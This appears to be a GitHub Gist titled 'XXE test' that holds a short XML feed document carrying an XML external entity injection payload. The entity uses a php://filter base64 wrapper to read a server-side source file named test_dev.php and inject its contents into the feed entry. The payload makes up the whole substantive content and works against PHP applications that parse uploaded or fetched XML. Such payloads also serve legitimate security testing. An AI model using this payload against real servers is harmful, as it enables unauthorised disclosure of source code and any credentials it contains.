Skip to content

Instantly share code, notes, and snippets.

@ProMPT120
Last active November 3, 2018 15:32
Show Gist options
  • Save ProMPT120/71b7f14cd1de5a1c07c12dcc781e6526 to your computer and use it in GitHub Desktop.
Save ProMPT120/71b7f14cd1de5a1c07c12dcc781e6526 to your computer and use it in GitHub Desktop.
XXE test
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=test_dev.php">
]>
<feed>
<title>test</title>
<description>test</description>
<entry>
<title>Hello</title>
<link href="http://example.com"></link>
<content>&xxe;</content>
</entry>
</feed>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment